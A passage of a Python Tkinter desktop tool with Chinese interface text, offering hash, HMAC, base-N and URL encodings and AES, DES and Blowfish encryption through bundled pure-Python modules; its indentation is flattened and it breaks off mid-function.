0xA9, 0x68, 0x79, 0x91, 0x15, 0xB2, 0x07, 0x3F, 0x94, 0xC2, 0x10, 0x89, 0x0B, 0x22, 0x5F, 0x21,
0x80, 0x7F, 0x5D, 0x9A, 0x5A, 0x90, 0x32, 0x27, 0x35, 0x3E, 0xCC, 0xE7, 0xBF, 0xF7, 0x97, 0x03,
0xFF, 0x19, 0x30, 0xB3, 0x48, 0xA5, 0xB5, 0xD1, 0xD7, 0x5E, 0x92, 0x2A, 0xAC, 0x56, 0xAA, 0xC6,
0x4F, 0xB8, 0x38, 0xD2, 0x96, 0xA4, 0x7D, 0xB6, 0x76, 0xFC, 0x6B, 0xE2, 0x9C, 0x74, 0x04, 0xF1,
0x45, 0x9D, 0x70, 0x59, 0x64, 0x71, 0x87, 0x20, 0x86, 0x5B, 0xCF, 0x65, 0xE6, 0x2D, 0xA8, 0x02,
0x1B, 0x60, 0x25, 0xAD, 0xAE, 0xB0, 0xB9, 0xF6, 0x1C, 0x46, 0x61, 0x69, 0x34, 0x40, 0x7E, 0x0F,
0x55, 0x47, 0xA3, 0x23, 0xDD, 0x51, 0xAF, 0x3A, 0xC3, 0x5C, 0xF9, 0xCE, 0xBA, 0xC5, 0xEA, 0x26,
0x2C, 0x53, 0x0D, 0x6E, 0x85, 0x28, 0x84, 0x09, 0xD3, 0xDF, 0xCD, 0xF4, 0x41, 0x81, 0x4D, 0x52,
0x6A, 0xDC, 0x37, 0xC8, 0x6C, 0xC1, 0xAB, 0xFA, 0x24, 0xE1, 0x7B, 0x08, 0x0C, 0xBD, 0xB1, 0x4A,
0x78, 0x88, 0x95, 0x8B, 0xE3, 0x63, 0xE8, 0x6D, 0xE9, 0xCB, 0xD5, 0xFE, 0x3B, 0x00, 0x1D, 0x39,
0xF2, 0xEF, 0xB7, 0x0E, 0x66, 0x58, 0xD0, 0xE4, 0xA6, 0x77, 0x72, 0xF8, 0xEB, 0x75, 0x4B, 0x0A,
0x31, 0x44, 0x50, 0xB4, 0x8F, 0xED, 0x1F, 0x1A, 0xDB, 0x99, 0x8D, 0x33, 0x9F, 0x11, 0x83, 0x14,
]
def md2hex(message:bytes):
s = _hash(list(message))
v = 0
for idx,i in enumerate(s[::-1]):
v += i << idx*8
return hex(v)[2:]
def encode_all(text,debug=False):
text = text.encode() if type(text) == str else text
ret = {}
for name in allow:
v = md2hex(text) if name == 'md2' else hashlib.new(name, text).hexdigest()
v = v.upper() if upper else v.lower()
ret[name] = v
if debug: print('[*]{:<10}{}'.format(name, v))
return ret
def encode_all_withsalt(salt,text,debug=False):
salt = salt.encode() if type(salt) == str else salt
text = text.encode() if type(text) == str else text
ret = {}
for name in allow:
if name == 'md2':continue
v = hmac.new(salt,text,name).hexdigest()
v = v.upper() if upper else v.lower()
ret[name] = v
if debug: print('[hmac]{:<10}{}'.format(name, v))
return ret
allow = \
$allow
upper = True # 是否使用大写
if __name__ == '__main__':
salt = '$salt' # 字符串/byte类型 盐(默认空)
text = '$text' # 字符串/byte类型 需要被加密的数据
import pprint
v = encode_all(text)
print('[*]')
pprint.pprint(v)
print()
print('[hmac]')
v = encode_all_withsalt(salt,text)
pprint.pprint(v)
'''.strip()
code = code.replace('$allow', pprint.pformat(allow))
code = code.replace('$compare_str', compare_str)
code = code.replace('$salt', salt)
code = code.replace('$text', text)
print(code)
bt_ = Button(f1_,text='分析对比[忽略大小写]',command=_analysis_diff)
bt_.pack(side=tkinter.LEFT,padx=padx,pady=pady,)
bt2_ = Button(f1_,text='测用代码',command=_creat_code)
bt2_.pack(side=tkinter.LEFT,padx=padx,pady=pady,)
txt = Text(f2_,font=ft)
txt.pack(padx=padx,pady=pady,fill=tkinter.BOTH,expand=True)
basehp = r'''
通用加解密(请将需要加/解密的数据输入右侧窗口)
base加密:
[-] 这种类型只能对数字进行加解密
[*] 这种类型能对一般数据流进行加解密
[/] 这种类型通过正则切分并针对字符串内的数字进行 bytes 转换
base_8 RegExp:[0-7]{1,3} : r"\o123\o123" => bytes([0o123, 0o123])
r"123123" => bytes([0o123, 0o123])
base_10 RegExp:[0-9]{1,3} : r"\123\123" => bytes([123, 123])
r"123123" => bytes([123, 123])
base_16 RegExp:[0-9a-fA-F]{2}: r"\xbe\xac" => bytes([0xbe, 0xac])
r"beac" => bytes([0xbe, 0xac])
(由于输出框不显示无法解码数据,如需 bit 类型数据请直接使用"其他算法")
注意:
左边 Entry 控件在单行文书输入过长时会有卡顿甚至卡死
右边 Text 控件虽然也有相同的问题,但能接受更长的单行文本(行数不限)
所以长字符串的加解密,请使用单独的加解密按钮实现
全部加解密:
[input] 使用右边->窗口为输入 [output] 使用左边<-窗口为输出
单独加解密:
[input] 使用右边->窗口为输入 [output] 使用右边->窗口为输出
'''.strip('\n')
_fr = Frame(fr)
enb.add(_fr, text='通用解密')
enb.pack()
enb_names[_fr._name] = '通用解密'
f3 = Frame(_fr)
f3.pack(side=tkinter.LEFT,fill=tkinter.BOTH)
f3_ = Frame(_fr)
f3_.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
f4 = Frame(f3)
f5 = Frame(f3)
f4.pack(fill=tkinter.BOTH)
f5.pack(fill=tkinter.BOTH,expand=True)
base_algos = [
'base36', # 貌似仅用于数字映射
'base62', # 貌似仅用于数字映射
'base16',
'base32',
'base58',
'base64',
'urlsafe_b64',
'base85',
'base91',
]
bs = {}
html_quote = [
'base_2',
'base_8',
'base_10',
'base_16',
'quote',
'urlquote',
'escape',
'unicode',
]
for idx,name in enumerate(base_algos+html_quote):
if name in base_algos:
t = '[*]' if name not in ('base36', 'base62') else '[-]'
l,e = Label(f5,text=t+name,font=ft),Entry(f5,width=width,font=ft)
b1,b2 = Button(f5,text='加',width=3), Button(f5,text='解',width=3)
b2.grid(row=idx,column=3,ipadx=0,ipady=0,padx=0,pady=0,sticky=sticky)
b1.grid(row=idx,column=2,ipadx=0,ipady=0,padx=0,pady=0,sticky=sticky)
bs[name] = e,b1,b2
e.grid(row=idx,column=1,ipadx=ipadx,ipady=ipady,padx=padx,pady=pady,sticky=sticky)
l.grid(row=idx,column=0,ipadx=ipadx,ipady=ipady,padx=padx,pady=pady,sticky=sticky)
if name in html_quote:
if name.startswith('base_'): name = '[/]' + name
l,e = Label(f5,text=name,font=ft),Entry(f5,width=width,font=ft)
b1,b2 = Button(f5,text='加',width=3), Button(f5,text='解',width=3)
b2.grid(row=idx,column=3,ipadx=0,ipady=0,padx=0,pady=0,sticky=sticky)
b1.grid(row=idx,column=2,ipadx=0,ipady=0,padx=0,pady=0,sticky=sticky)
bs[name] = e,b1,b2
e.grid(row=idx,column=1,ipadx=ipadx,ipady=ipady,padx=padx,pady=pady,sticky=sticky)
l.grid(row=idx,column=0,ipadx=ipadx,ipady=ipady,padx=padx,pady=pady,sticky=sticky)
def _b_encode(*a):
encd = bben.get().strip()
text = bbtxt.get(0.,tkinter.END).strip('\n').encode(encd)
limit = 1000
if len(text) > limit:
print('error ! 由于Entry组件性能问题,全部加密解密模式只能在右侧窗口直接使用[单独加解进行]')
print('当前加密字符串的长度为{},超过限制{}'.format(len(text), limit))
print('\n'*10)
bbtxt.see(tkinter.END)
return
try:
from . import pybase, pyplus
except:
import pybase, pyplus
for name,(ge,gb1,gb2) in bs.items():
ge.delete(0,tkinter.END)
try:
if name in base_algos:
base_encode, base_decode = pybase.base_algos[name]
ge.insert(0,base_encode(text))
name = name.strip('[/]')
if name in html_quote:
plus_encode, plus_decode = pyplus.html_quote[name]
ge.insert(0,plus_encode(text, encd))
except:
import traceback; traceback.print_exc()
ge.insert(0,'error.!')
if name in ('base36', 'base62'):
ge.insert(tkinter.END,'{} can only parse int type.'.format(name))
def _b_decode(*a):
encd = bben.get().strip()
text = bbtxt.get(0.,tkinter.END).strip('\n').encode()
limit = 1000
if len(text) > limit:
print('error ! 由于Entry组件性能问题,全部加密解密模式只能在右侧窗口直接使用[单独加解进行]')
print('当前加密字符串的长度为{},超过限制{}'.format(len(text), limit))
print('\n'*10)
bbtxt.see(tkinter.END)
return
try:
from . import pybase, pyplus
except:
import pybase, pyplus
for name,(ge,gb1,gb2) in bs.items():
ge.delete(0,tkinter.END)
try:
if name in base_algos:
base_encode, base_decode = pybase.base_algos[name]
ge.insert(0,base_decode(text).decode(encd))
name = name.strip('[/]')
if name in html_quote:
plus_encode, plus_decode = pyplus.html_quote[name]
ge.insert(0,plus_decode(text.decode(), encoding=encd))
except:
import traceback; traceback.print_exc()
ge.insert(0,'error')
def _pybase_code(*a):
try:
from . import pybase
except:
import pybase
bbtxt.delete(0.,tkinter.END)
with open(pybase.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
def _pyplus_code(*a):
try:
from . import pyplus
except:
import pyplus
bbtxt.delete(0.,tkinter.END)
with open(pyplus.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
def pack_button(name):
def do():
nonlocal name
encd = bben.get().strip()
text = bbtxt.get(0.,tkinter.END).strip('\n').encode(encd)
bbtxt.delete(0.,tkinter.END)
try:
from . import pybase, pyplus
except:
import pybase, pyplus
try:
if name in base_algos:
base_encode, base_decode = pybase.base_algos[name]
v = base_encode(text)
v = v.decode() if isinstance(v, bytes) else v
print(v)
name = name.strip('[/]')
if name in html_quote:
plus_encode, plus_decode = pyplus.html_quote[name]
print(plus_encode(text, encd))
except:
import traceback
print(traceback.format_exc())
def undo():
nonlocal name
encd = bben.get().strip()
text = bbtxt.get(0.,tkinter.END).strip('\n').encode()
bbtxt.delete(0.,tkinter.END)
try:
from . import pybase, pyplus
except:
import pybase, pyplus
try:
if name in base_algos:
base_encode, base_decode = pybase.base_algos[name]
print(base_decode(text).decode(encd))
name = name.strip('[/]')
if name in html_quote:
plus_encode, plus_decode = pyplus.html_quote[name]
print(plus_decode(text.decode(), encoding=encd))
except:
import traceback
print(traceback.format_exc())
class d:pass
d.do = do
d.undo = undo
return d
Label(f4,text=basehp,font=ft).pack(side=tkinter.TOP,padx=6)
Button(f4,text='其他算法',width=8,command=_pyplus_code).pack(side=tkinter.RIGHT)
Button(f4,text='base算法',width=8,command=_pybase_code).pack(side=tkinter.RIGHT)
Button(f4,text='全部解密',width=8,command=_b_decode).pack(side=tkinter.RIGHT)
Button(f4,text='全部加密',width=8,command=_b_encode).pack(side=tkinter.RIGHT)
def _swich_bben(*a):
s = bben.get().strip()
if s == 'utf-8':
bben.delete(0,tkinter.END)
bben.insert(0,'gbk')
elif s == 'gbk':
bben.delete(0,tkinter.END)
bben.insert(0,'utf-8')
else:
bben.delete(0,tkinter.END)
bben.insert(0,'utf-8')
f4_ = Frame(f3_)
f4_.pack(fill=tkinter.BOTH)
f5_ = Frame(f3_)
f5_.pack(fill=tkinter.BOTH,expand=True)
Button(f4_, text='编码',command=_swich_bben,width=6).pack(side=tkinter.LEFT)
bben = Entry(f4_,width=5)
bben.insert(0,'utf-8')
bben.pack(side=tkinter.LEFT)
bbtxt = Text(f5_,font=ft)
bbtxt.pack(padx=padx,pady=pady,fill=tkinter.BOTH,expand=True)
for name,(ge,gb1,gb2) in bs.items():
d = pack_button(name)
gb1['command'] = d.do
gb2['command'] = d.undo
_fr0 = Frame(fr)
enb.add(_fr0, text='算法加解密')
enb.pack()
enb_names[_fr0._name] = '算法加解密'
ff0 = Frame(_fr0)
ff0.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
ff0_ = Frame(_fr0)
ff0_.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
def _my_encode(*a):
estr = ftxt.get(0.,tkinter.END).strip('\n')
ftxt.delete(0.,tkinter.END)
_ack = ent22.get().strip() if aa.get() else ''
base = cbx.get()
try:
from . import pyzlibaes
except:
import pyzlibaes
c = pyzlibaes.crypter(_ack, base=base)
print(c.zencrypt(estr))
def _my_decode(*a):
dstr = ftxt.get(0.,tkinter.END).strip('\n')
_ack = ent22.get().strip() if aa.get() else ''
base = cbx.get()
try:
from . import pyzlibaes
except:
import pyzlibaes
c = pyzlibaes.crypter(_ack, base=base)
try:
s = c.zdecrypt(dstr)
ftxt.delete(0.,tkinter.END)
print(s)
except:
tkinter.messagebox.showinfo('Error','密码或解密文本错误.\n\n'+traceback.format_exc())
def _my_code(*a):
ftxt.delete(0.,tkinter.END)
try:
from . import pyzlibaes
except:
import pyzlibaes
ftxt.delete(0.,tkinter.END)
with open(pyzlibaes.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
pure_python_encrypthelp = '''
纯 python 实现的加解密算法
该处大部分算法均为从各个地方收集而来的、或是我自己写的纯 python 实现的加解密算法,
如果没有特别苛刻的环境要求,请还是尽量使用成熟的加解密函数库来实现
'''.strip('\n')
f20 = Frame(ff0)
f20.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f20, text=pure_python_encrypthelp,font=ft).pack(fill=tkinter.X,expand=True)
f21 = Frame(ff0)
f21.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f21, text=' 以下算法为个人私用。应对 python 压缩的、无外部依赖库的、混合AES的、字符串加解密。').pack(fill=tkinter.X,expand=True)
f22 = Frame(ff0)
f22.pack(side=tkinter.TOP,fill=tkinter.X)
ent22 = Entry(f22,width=10)
def _switch_ack(*a):
def _show(*a, stat='show'):
try:
if stat == 'show': ent22.pack(side=tkinter.LEFT)
if stat == 'hide': ent22.pack_forget()
except:
pass
_show(stat='show') if aa.get() else _show(stat='hide')
aa = tkinter.IntVar()
ab = Checkbutton(f22,text='密码',variable=aa,command=_switch_ack)
ab.pack(side=tkinter.LEFT)
ab.deselect()
cbx = Combobox(f22,width=4,state='readonly')
cbx['values'] = base64enc = ['b16','b32','b64','b85',]
cbx.current(3)
cbx.pack(side=tkinter.RIGHT)
Label(f22, text='编码',width=4).pack(side=tkinter.RIGHT,padx=5)
Button(f22, text='[算法]',command=_my_code,width=5).pack(side=tkinter.RIGHT)
Button(f22, text='解密',command=_my_decode,width=5).pack(side=tkinter.RIGHT)
Button(f22, text='加密',command=_my_encode,width=5).pack(side=tkinter.RIGHT)
txttitlefr = Frame(ff0_)
txttitlefr.pack(side=tkinter.TOP)
Label(txttitlefr, text='使用以下文本框进行加解密 [仅忽略文本前后换行符,空格不忽略],显示限制字符数:').pack(side=tkinter.LEFT,padx=10)
entlimit = Entry(txttitlefr, width=10)
entlimit.pack(side=tkinter.LEFT)
entlimit.insert(0,'10000')
ftxt = Text(ff0_,font=ft)
ftxt.pack(padx=padx,pady=pady,fill=tkinter.BOTH,expand=True)
def change_cbit_1(*content):
if content:
encd = fent1.get().strip()
blen = len(content[0].encode(encd))*8
cbit1['text'] = str(blen)+'bit'
return True
def change_cbit_2(*content):
if content:
encd = fent1.get().strip()
blen = len(content[0].encode(encd))*8
cbit2['text'] = str(blen)+'bit'
return True
change_cbit1 = root.register(change_cbit_1)
change_cbit2 = root.register(change_cbit_2)
# 这里后续需要考虑增加各种各样的加密解密以及代码的记录
# 光是aes就有5种加解密方式
f23 = Frame(ff0)
f23.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f23, text=' 以下算法为 AES 加解密算法 [密码长度需注意:128bit,192bit,256bit] [iv长度需注意:128bit]。').pack(fill=tkinter.X,expand=True)
f24 = Frame(ff0)
f24.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f24, text='密码',width=4).pack(side=tkinter.LEFT,padx=2)
ent23 = Entry(f24,width=17,validate='key',validatecommand=(change_cbit1, '%P'))
ent23.pack(side=tkinter.LEFT)
ent23.bind('<Key>', change_cbit1)
cbit1 = Label(f24, text='0bit',width=6)
cbit1.pack(side=tkinter.LEFT,padx=6)
cbx1 = Combobox(f24,width=4,state='readonly')
cbx1['values'] = ['b16','b32','b64','b85']
cbx1.current(2)
cbx1.pack(side=tkinter.RIGHT)
Label(f24, text='编码',width=4).pack(side=tkinter.RIGHT,padx=5)
def _swich_encd1(*a):
s = fent1.get().strip()
if s == 'utf-8':
fent1.delete(0,tkinter.END)
fent1.insert(0,'gbk')
elif s == 'gbk':
fent1.delete(0,tkinter.END)
fent1.insert(0,'utf-8')
else:
fent1.delete(0,tkinter.END)
fent1.insert(0,'utf-8')
change_cbit_1(ent23.get().strip())
change_cbit_2(ent24.get().strip())
fent1 = Entry(f24,width=5)
fent1.insert(0,'utf-8')
fent1.pack(side=tkinter.RIGHT)
Button(f24, text='密码/iv/数据编码格式',command=_swich_encd1).pack(side=tkinter.RIGHT)
cbx2 = Combobox(f24,width=4,state='readonly')
cbx2['values'] = ['cbc','cfb','ofb','ctr','ecb',]
cbx2.current(0)
cbx2.pack(side=tkinter.RIGHT)
Label(f24, text='模式',width=4).pack(side=tkinter.RIGHT,padx=5)
f25 = Frame(ff0)
f25.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f25, text='iv',width=4).pack(side=tkinter.LEFT,padx=2)
ent24 = Entry(f25,width=17,validate='key',validatecommand=(change_cbit2, '%P'))
ent24.pack(side=tkinter.LEFT)
cbit2 = Label(f25, text='128:bit',width=6)
cbit2.pack(side=tkinter.LEFT,padx=6)
ent24.insert(0,'1234567890123456')
Label(f25, text='ecb模式:iv无效;ctr模式:iv长度不限制',).pack(side=tkinter.LEFT,padx=6)
def _aes_encode(*a):
encd = fent1.get().strip()
mode = cbx2.get().strip()
eout = cbx1.get().strip()
key = ent23.get().strip().encode(encd)
iv = ent24.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
limitnum = int(entlimit.get().strip())
ftxt.delete(0.,tkinter.END)
try:
from . import pyaes
except:
# 请勿在本脚本测试时安装了 pyaes,pyaes的源码部分有问题
import pyaes
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
Encrypter = pyaes.Encrypter
Counter = pyaes.Counter
AESModesOfOperation = pyaes.AESModesOfOperation
try:
if mode in 'ctr':
enc = Encrypter(AESModesOfOperation[mode](key, Counter(int.from_bytes(iv, 'big'))))
elif mode == 'ecb':
enc = Encrypter(AESModesOfOperation[mode](key))
else:
enc = Encrypter(AESModesOfOperation[mode](key, iv))
en = _encode(enc.feed(data)).decode(encd)
if len(en) > limitnum:
print('警告!')
print('加密数据长度({})过长(超过{}字符,超过的部分不显示)'.format(len(en),limitnum))
print('因为 tkinter 性能瓶颈,不宜在 tkinter 窗口展示,请使用算法在别的IDE内实现')
print('---------------------------------------------------')
print(en[:limitnum])
else:
print(en)
except:
print(traceback.format_exc())
def _aes_decode(*a):
encd = fent1.get().strip()
mode = cbx2.get().strip()
eout = cbx1.get().strip()
key = ent23.get().strip().encode(encd)
iv = ent24.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
ftxt.delete(0.,tkinter.END)
try:
from . import pyaes
except:
# 请勿在本脚本测试时安装了 pyaes,pyaes的源码部分有问题
import pyaes
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
Decrypter = pyaes.Decrypter
Counter = pyaes.Counter
AESModesOfOperation = pyaes.AESModesOfOperation
try:
if mode in 'ctr':
dec = Decrypter(AESModesOfOperation[mode](key, Counter(int.from_bytes(iv, 'big'))))
elif mode == 'ecb':
dec = Decrypter(AESModesOfOperation[mode](key))
else:
dec = Decrypter(AESModesOfOperation[mode](key, iv))
dc = dec.feed(_decode(data)).decode(encd)
print(dc)
except:
print(traceback.format_exc())
def _aes_code(*a):
try:
from . import pyaes
except:
import pyaes
ftxt.delete(0.,tkinter.END)
with open(pyaes.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(f25, text='[算法]',command=_aes_code,width=5).pack(side=tkinter.RIGHT)
Button(f25, text='解密',command=_aes_decode,width=5).pack(side=tkinter.RIGHT)
Button(f25, text='加密',command=_aes_encode,width=5).pack(side=tkinter.RIGHT)
# 这部分是后续增加的纯 python 的des解密
def change_cbit_3(*content):
if content:
encd = fent2.get().strip()
blen = len(content[0].encode(encd))*8
cbit3['text'] = str(blen)+'bit'
return True
def change_cbit_4(*content):
if content:
encd = fent2.get().strip()
blen = len(content[0].encode(encd))*8
cbit4['text'] = str(blen)+'bit'
return True
change_cbit3 = root.register(change_cbit_3)
change_cbit4 = root.register(change_cbit_4)
f23 = Frame(ff0)
f23.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f23, text=' 以下算法为 DES/3DES 加解密算法 [密码长度:64bit(DES),128bit(3DES),192bit(3DES)] [iv长度:64bit]。').pack(fill=tkinter.X,expand=True)
f24 = Frame(ff0)
f24.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f24, text='密码',width=4).pack(side=tkinter.LEFT,padx=2)
ent25 = Entry(f24,width=17,validate='key',validatecommand=(change_cbit3, '%P'))
ent25.pack(side=tkinter.LEFT)
ent25.bind('<Key>', change_cbit3)
cbit3 = Label(f24, text='0bit',width=6)
cbit3.pack(side=tkinter.LEFT,padx=6)
cbx3 = Combobox(f24,width=4,state='readonly')
cbx3['values'] = ['b16','b32','b64','b85']
cbx3.current(2)
cbx3.pack(side=tkinter.RIGHT)
Label(f24, text='编码',width=4).pack(side=tkinter.RIGHT,padx=5)
def _swich_encd2(*a):
s = fent2.get().strip()
if s == 'utf-8':
fent2.delete(0,tkinter.END)
fent2.insert(0,'gbk')
elif s == 'gbk':
fent2.delete(0,tkinter.END)
fent2.insert(0,'utf-8')
else:
fent2.delete(0,tkinter.END)
fent2.insert(0,'utf-8')
change_cbit_3(ent25.get().strip())
change_cbit_4(ent26.get().strip())
fent2 = Entry(f24,width=5)
fent2.insert(0,'utf-8')
fent2.pack(side=tkinter.RIGHT)
Button(f24, text='密码/iv/数据编码格式',command=_swich_encd2).pack(side=tkinter.RIGHT)
cbx4 = Combobox(f24,width=4,state='readonly')
cbx4['values'] = ['cbc','ecb',]
cbx4.current(0)
cbx4.pack(side=tkinter.RIGHT)
Label(f24, text='模式',width=4).pack(side=tkinter.RIGHT,padx=5)
f25 = Frame(ff0)
f25.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f25, text='iv',width=4).pack(side=tkinter.LEFT,padx=2)
ent26 = Entry(f25,width=17,validate='key',validatecommand=(change_cbit4, '%P'))
ent26.pack(side=tkinter.LEFT)
cbit4 = Label(f25, text='128:bit',width=6)
cbit4.pack(side=tkinter.LEFT,padx=6)
ent26.insert(0,'12345678')
Label(f25, text='ecb模式:iv无效;ctr模式:iv长度不限制',).pack(side=tkinter.LEFT,padx=6)
def _des_encode(*a):
encd = fent2.get().strip()
mode = cbx4.get().strip()
eout = cbx3.get().strip()
key = ent25.get().strip().encode(encd)
iv = ent26.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
limitnum = int(entlimit.get().strip())
ftxt.delete(0.,tkinter.END)
try:
from . import pydes
except:
# 请勿在本脚本测试时安装了 pyaes,pyaes的源码部分有问题
import pydes
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
if len(key) not in [8,16,24]:
print('error. len(key) must in [64bit,128bit,192bit]. now is {}.'.format(len(key)*8))
return
try:
if mode in 'ecb': mode = pydes.ECB
elif mode == 'cbc': mode = pydes.CBC
else:
print('error mode:{}, mode must in [ecb cbc]'.format(mode))
if len(key) == 8:
d = pydes.des(key, mode, iv, padmode=pydes.PAD_PKCS5)
else:
d = pydes.triple_des(key, mode, iv, padmode=pydes.PAD_PKCS5)
en = _encode(d.encrypt(data)).decode(encd)
if len(en) > limitnum:
print('警告!')
print('加密数据长度({})过长(超过{}字符,超过的部分不显示)'.format(len(en),limitnum))
print('因为 tkinter 性能瓶颈,不宜在 tkinter 窗口展示,请使用算法在别的IDE内实现')
print('---------------------------------------------------')
print(en[:limitnum])
else:
print(en)
except:
print(traceback.format_exc())
def _des_decode(*a):
encd = fent2.get().strip()
mode = cbx4.get().strip()
eout = cbx3.get().strip()
key = ent25.get().strip().encode(encd)
iv = ent26.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
ftxt.delete(0.,tkinter.END)
try:
from . import pydes
except:
# 请勿在本脚本测试时安装了 pyaes,pyaes的源码部分有问题
import pydes
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
if len(key) not in [8,16,24]:
print('error. len(key) must in [64bit,128bit,192bit]. now is {}.'.format(len(key)*8))
return
try:
if mode in 'ecb': mode = pydes.ECB
elif mode == 'cbc': mode = pydes.CBC
else:
print('error mode:{}, mode must in [ecb cbc]'.format(mode))
if len(key) == 8:
d = pydes.des(key, mode, iv, padmode=pydes.PAD_PKCS5)
else:
d = pydes.triple_des(key, mode, iv, padmode=pydes.PAD_PKCS5)
dc = d.decrypt(_decode(data)).decode(encd)
print(dc)
except:
print(traceback.format_exc())
def _des_code(*a):
try:
from . import pydes
except:
import pydes
ftxt.delete(0.,tkinter.END)
with open(pydes.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(f25, text='[算法]',command=_des_code,width=5).pack(side=tkinter.RIGHT)
Button(f25, text='解密',command=_des_decode,width=5).pack(side=tkinter.RIGHT)
Button(f25, text='加密',command=_des_encode,width=5).pack(side=tkinter.RIGHT)
# 这里是 blowfish 算法的部分
def f100_change_cbit_1(*content):
if content:
encd = f1001_fent1.get().strip()
blen = len(content[0].encode(encd))*8
f1001_cbit1['text'] = str(blen)+'bit'
return True
def f100_change_cbit_2(*content):
if content:
encd = f1001_fent1.get().strip()
blen = len(content[0].encode(encd))*8
f1002_cbit2['text'] = str(blen)+'bit'
return True
f100_change_cbit1 = root.register(f100_change_cbit_1)
f100_change_cbit2 = root.register(f100_change_cbit_2)
f1000 = Frame(ff0)
f1000.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f1000, text=' 以下算法为 Blowfish 加解密算法 [密码长度区间:32-448bit] [iv长度需注意:64bit]。').pack(fill=tkinter.X,expand=True)
f1001 = Frame(ff0)
f1001.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f1001, text='密码',width=4).pack(side=tkinter.LEFT,padx=2)
f1001_ent1 = Entry(f1001,width=17,validate='key',validatecommand=(f100_change_cbit1, '%P'))
f1001_ent1.pack(side=tkinter.LEFT)
f1001_ent1.bind('<Key>', f100_change_cbit1)
f1001_cbit1 = Label(f1001, text='0bit',width=6)
f1001_cbit1.pack(side=tkinter.LEFT,padx=6)
f1001_mode1 = Combobox(f1001,width=4,state='readonly')
f1001_mode1['values'] = ['b16','b32','b64','b85']
f1001_mode1.current(2)
f1001_mode1.pack(side=tkinter.RIGHT)
Label(f1001, text='编码',width=4).pack(side=tkinter.RIGHT,padx=5)
def _f100swich_encd1(*a):
s = f1001_fent1.get().strip()
if s == 'utf-8':
f1001_fent1.delete(0,tkinter.END)
f1001_fent1.insert(0,'gbk')
elif s == 'gbk':
f1001_fent1.delete(0,tkinter.END)
f1001_fent1.insert(0,'utf-8')
else:
f1001_fent1.delete(0,tkinter.END)
f1001_fent1.insert(0,'utf-8')
f100_change_cbit_1(f1001_ent1.get().strip())
f100_change_cbit_2(f1002_ent2.get().strip())
f1001_fent1 = Entry(f1001,width=5)
f1001_fent1.insert(0,'utf-8')
f1001_fent1.pack(side=tkinter.RIGHT)
Button(f1001, text='密码/iv/数据编码格式',command=_f100swich_encd1).pack(side=tkinter.RIGHT)
f1001_mode2 = Combobox(f1001,width=4,state='readonly')
f1001_mode2['values'] = ['ecb', 'ecb_cts', 'cbc', 'cbc_cts', 'pcbc', 'cfb', 'ofb', 'ctr']
f1001_mode2.current(0)
f1001_mode2.pack(side=tkinter.RIGHT)
Label(f1001, text='模式',width=4).pack(side=tkinter.RIGHT,padx=5)
f1002 = Frame(ff0)
f1002.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f1002, text='iv',width=4).pack(side=tkinter.LEFT,padx=2)
f1002_ent2 = Entry(f1002,width=17,validate='key',validatecommand=(f100_change_cbit2, '%P'))
f1002_ent2.pack(side=tkinter.LEFT)
f1002_cbit2 = Label(f1002, text='128:bit',width=6)
f1002_cbit2.pack(side=tkinter.LEFT,padx=6)
f1002_ent2.insert(0,'12345678')
Label(f1002, text='ecb模式:iv无效;ctr模式:iv长度不限制',).pack(side=tkinter.LEFT,padx=6)
def _blowfish_encode(*a):
encd = f1001_fent1.get().strip()
mode = f1001_mode2.get().strip()
eout = f1001_mode1.get().strip()
key = f1001_ent1.get().strip().encode(encd)
iv = f1002_ent2.get().strip().encode(encd)
data = ftxt.get(0.,tkinter.END).strip('\n').encode(encd)
limitnum = int(entlimit.get().strip())
ftxt.delete(0.,tkinter.END)
try:
from . import pyblowfish
except:
import pyblowfish
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
en = pyblowfish.encrypt(key, data, iv, mode, enfunc=_encode).decode(encd)
if len(en) > limitnum:
print('警告!')
print('加密数据长度({})过长(超过{}字符,超过的部分不显示)'.format(len(en),limitnum))
